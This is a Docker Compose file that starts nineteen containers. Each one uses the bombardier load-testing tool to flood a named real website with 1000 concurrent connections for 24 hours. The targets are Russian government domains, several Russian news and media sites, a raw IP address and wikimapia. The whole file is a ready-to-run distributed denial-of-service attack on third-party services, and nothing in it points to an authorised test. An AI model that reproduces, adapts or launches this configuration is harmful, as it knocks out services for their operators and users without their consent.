version: "3.9"
services:
        media_1:
                image: alpine/bombardier
                command: "-c 1000 -t 2s -l -d 24h https://wikimapia.org/#lang=en&lat=50.584800&lon=30.489800&z=12&m=w&tag=516"
        media_2:
                image: alpine/bombardier
                command: "-c 1000 -t 2s -l -d 24h https://185.169.155.16"
        media_3:
                image: alpine/bombardier
                command: "-c 1000 -t 2s -l -d 24h https://cloud.rkn.gov.ru"
        media_4:
                image: alpine/bombardier
                command: "-c 1000 -t 2s -l -d 24h https://mvd.gov.ru"
        media_5:
                image: alpine/bombardier
                command: "-c 1000 -t 2s -l -d 24h https://pwd.wto.economy.gov.ru"
        media_6:
                image: alpine/bombardier
                command: "-c 1000 -t 2s -l -d 24h https://stroi.gov.ru"
        media_7:
                image: alpine/bombardier
                command: "-c 1000 -t 2s -l -d 24h https://ria.ru"
        media_8:
                image: alpine/bombardier
                command: "-c 1000 -t 2s -l -d 24h https://gazeta.ru"
        media_9:
                image: alpine/bombardier
                command: "-c 1000 -t 2s -l -d 24h https://kp.ru"
        media_10:
                image: alpine/bombardier
                command: "-c 1000 -t 2s -l -d 24h https://riafan.ru"
        media_11:
                image: alpine/bombardier
                command: "-c 1000 -t 2s -l -d 24h https://pikabu.ru"
        media_12:
                image: alpine/bombardier
                command: "-c 1000 -t 2s -l -d 24h https://kommersant.ru"
        media_13:
                image: alpine/bombardier
                command: "-c 1000 -t 2s -l -d 24h https://mk.ru"
        media_14:
                image: alpine/bombardier
                command: "-c 1000 -t 2s -l -d 24h https://yaplakal.com"
        media_15:
                image: alpine/bombardier
                command: "-c 1000 -t 2s -l -d 24h https://rbc.ru"
        media_16:
                image: alpine/bombardier
                command: "-c 1000 -t 2s -l -d 24h https://bezformata.com"
        media_17:
                image: alpine/bombardier
                command: "-c 1000 -t 2s -l -d 24h https://shop-rt.com"
        media_18:
                image: alpine/bombardier
                command: "-c 1000 -t 2s -l -d 24h https://mail.rkn.gov.ru"
        media_19:
                image: alpine/bombardier
                command: "-c 1000 -t 2s -l -d 24h https://mail.rkn.gov.ru"

